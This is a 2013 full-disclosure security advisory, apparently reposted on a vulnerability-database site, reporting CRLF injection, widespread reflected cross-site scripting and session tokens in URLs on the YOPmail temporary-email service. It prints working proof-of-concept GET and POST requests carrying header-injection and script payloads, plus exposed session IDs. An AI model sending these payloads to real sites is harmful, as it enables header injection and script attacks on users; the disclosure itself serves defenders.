`YOPMAIL(Anonymous&Free email address) CRLF Injection-HTTP Response Spliting/XSS/Session Token in URL
==================================================================================================================================================
Report-Timeline:
================
2013-06-01: Researcher Notification
2013-06-03: RESPONSE
2013-06-07: Ask About the issues
2013-06-10: Vendor Feedback
2013-06-13: Not Fixed
2013-06-16: Ask About the Issues
2013-06-27: Not Fixed / Not Response
2013-06-28: Full Disclosure
I-VULNERABILITIES
======================
#Title: YOPMAIL(Anonymous&Free email address) YopMail CRLFInjection-HTTP Response Spliting / XSS/ Session Token in URL /
#Vendor:http://www.yopmail.com
#Author:Juan Carlos García (@secnight)
#Follow me
http://www.highsec.es
http://hackingmadrid.blogspot.com
Twitter:@secnight
II-Introduction:
======================
YOPmail (Your Own Protection mail) is a temporary e-mail service. They keep a message up for 8 days.
It's possibble to send a message to another YOPmail address mail. No registration required. Firefox, Internet Explorer 7 and Opera add-ons are
downloadable. There are alternate domains.
Domains
@yopmail.fr
@yopmail.net
@cool.fr.nf
@jetable.fr.nf
@nospam.ze.tc
@nomail.xl.cx
@mega.zik.dj
@speed.1s.fr
@courriel.fr.nf
@moncourrier.fr.nf
@monemail.fr.nf
@monmail.fr.nf
@mail.mezimages.net
The site has new domains every three months.
III-PROOF OF CONCEPT
======================
CRLF INJECTION-HTTP RESPONSE SPLITING
______________________________________
The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Hackers
are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS cross-site scripting, cross-user
defacement, positioning of client's web-cache, hijacking of web pages, defacement and a myriad of other related attacks
Attacks
-------
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717
Multiple CROSS SITE SCRIPTING
_______________________________
The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a
manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.
Attacks
--------
Below I expose a few vulnerabilities because many failures of this type in this web service... So much XSS..
Affected items
/add-domain.php
/alternate-domains.php
/alternate-email-address.php
/conditions.php
/contact.php
/definitions/email-jetable.php
/definitions/mail-anonyme.php
/definitions/spam.php
/donation.php
/email-anonyme.php
/email-generator.php
/en
/en/add-domain.php
/en/alternate-domains.php
/en/alternate-email-address.php
/en/conditions.php
/en/contact.php
/en/definitions
/en/definitions/email-jetable.php
/en/definitions/mail-anonyme.php
/en/definitions/spam.php
/en/donation.php
/en/email-anonyme.php
/en/email-generator.php
/en/faq.php
/en/images
/en/index.php
/en/plugins.php
/en/privacy.php
/en/send-mail.php
/en/style
/en/style/pic
/en/yopmail-chat.php
/es
/es/add-domain.php
/es/alternate-domains.php
/es/alternate-email-address.php
/es/conditions.php
/es/contact.php
/es/definitions
/es/definitions/email-jetable.php
/es/definitions/mail-anonyme.php
/es/definitions/spam.php
/es/donation.php
/es/email-anonyme.php
/es/email-generator.php
/es/faq.php
/es/images
/es/index.php
/es/plugins.php
/es/privacy.php
/es/send-mail.php
/es/style
/es/style/pic
/es/yopmail-chat.php
/faq.php
/fr
/fr/add-domain.php
/fr/alternate-domains.php
/fr/alternate-email-address.php
/fr/conditions.php
/fr/contact.php
/fr/definitions
/fr/definitions/email-jetable.php
/fr/definitions/mail-anonyme.php
/fr/definitions/spam.php
/fr/donation.php
/fr/email-anonyme.php
/fr/email-generator.php
/fr/faq.php
/fr/images
/fr/index.php
/fr/plugins.php
/fr/privacy.php
/fr/send-mail.php
/fr/style
/fr/style/pic
/fr/yopmail-chat.php
/index.php
/it
/it/add-domain.php
/it/alternate-domains.php
/it/alternate-email-address.php
/it/conditions.php
/it/contact.php
/it/definitions
/it/definitions/email-jetable.php
/it/definitions/mail-anonyme.php
/it/definitions/spam.php
/it/donation.php
/it/email-anonyme.php
/it/email-generator.php
/it/faq.php
/it/images
/it/index.php
/it/plugins.php
/it/privacy.php
/it/send-mail.php
/it/style
/it/style/pic
/it/yopmail-chat.php
/pl
/pl/add-domain.php
/pl/alternate-domains.php
/pl/alternate-email-address.php
/pl/conditions.php
/pl/contact.php
/pl/definitions
/pl/definitions/email-jetable.php
/pl/definitions/mail-anonyme.php
/pl/definitions/spam.php
/pl/donation.php
/pl/email-anonyme.php
/pl/email-generator.php
/pl/faq.php
/pl/images
/pl/index.php
/pl/plugins.php
/pl/privacy.php
/pl/send-mail.php
/pl/style
/pl/style/pic
/pl/yopmail-chat.php
/plugins.php
/privacy.php
/ru
/ru/add-domain.php
/ru/alternate-domains.php
/ru/alternate-email-address.php
/ru/conditions.php
/ru/contact.php
/ru/definitions
/ru/definitions/email-jetable.php
/ru/definitions/mail-anonyme.php
/ru/definitions/spam.php
/ru/donation.php
/ru/email-anonyme.php
/ru/email-generator.php
/ru/faq.php
/ru/images
/ru/index.php
/ru/plugins.php
/ru/privacy.php
/ru/send-mail.php
/ru/style
/ru/style/pic
/ru/yopmail-chat.php
/send-mail.php
/uk
/uk/add-domain.php
/uk/alternate-domains.php
/uk/alternate-email-address.php
/uk/conditions.php
/uk/contact.php
/uk/definitions
/uk/definitions/email-jetable.php
/uk/definitions/mail-anonyme.php
/uk/definitions/spam.php
/uk/donation.php
/uk/email-anonyme.php
/uk/email-generator.php
/uk/faq.php
/uk/images
/uk/index.php
/uk/plugins.php
/uk/privacy.php
/uk/send-mail.php
/uk/style
/uk/style/pic
/uk/yopmail-chat.php
/yopmail-chat.php
/zh
/zh/add-domain.php
/zh/alternate-domains.php
/zh/alternate-email-address.php
/zh/conditions.php
/zh/contact.php
/zh/definitions
/zh/definitions/email-jetable.php
/zh/definitions/mail-anonyme.php
/zh/definitions/spam.php
/zh/donation.php
/zh/email-anonyme.php
/zh/email-generator.php
/zh/faq.php
/zh/images
/zh/index.php
/zh/plugins.php
/zh/privacy.php
/zh/send-mail.php
/zh/style
/zh/style/pic
/zh/yopmail-chat.php
Method GET
----------
http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec
http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec
http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid
http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E
http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E
http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E
http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E
http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E
http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E
Method POST
------------
http://www.yopmail.com:80/send-mail.php
Request Data
act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec-
1oiflzkn&[email protected]&[email protected]&[email protected]
http://www.yopmail.com:80/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker-
dj9fvk3&[email protected]&[email protected]&[email protected]
http://www.yopmail.com:80/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner-
7ov0wsxm&[email protected]&[email protected]&[email protected]
http://www.yopmail.com:80/zh/send-mail.php
Request Data
act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt
%28939071%29%20bad%3d%22&[email protected]&[email protected]
http://www.yopmail.com:80/zh/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson-
0ojziwig&[email protected]&[email protected]&[email protected]
SESSION TOKEN IN URL
____________________
This application contains a session token in the query parameters. A session token is sensitive information and should not be stored in the URL.
URLs could be logged or leaked via the Referer header.
Affected items
--------------
/cr.php (78a3a31e275b316f36665b35eb4bfe21)
/email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1)
/email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3)
/email-anonyme.php (f508baf21a69429be4914c4008baf8ca)
/en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
Examples
Method GET
----------
http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID&
http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
Method POST
-----------
/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
Request Data
act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-
1oiflzkn&[email protected]&[email protected]&[email protected]
/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
Request Data
act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-
1oiflzkn&[email protected]&[email protected]&[email protected]
IV. CREDITS
-------------------------
This vulnerabilities has been discovered
by Juan Carlos García(@secnight)
V. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation